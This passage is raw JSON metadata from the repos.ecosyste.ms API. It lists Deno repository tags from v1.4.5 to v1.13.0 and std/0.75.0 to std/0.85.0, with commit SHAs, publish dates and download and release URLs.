v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/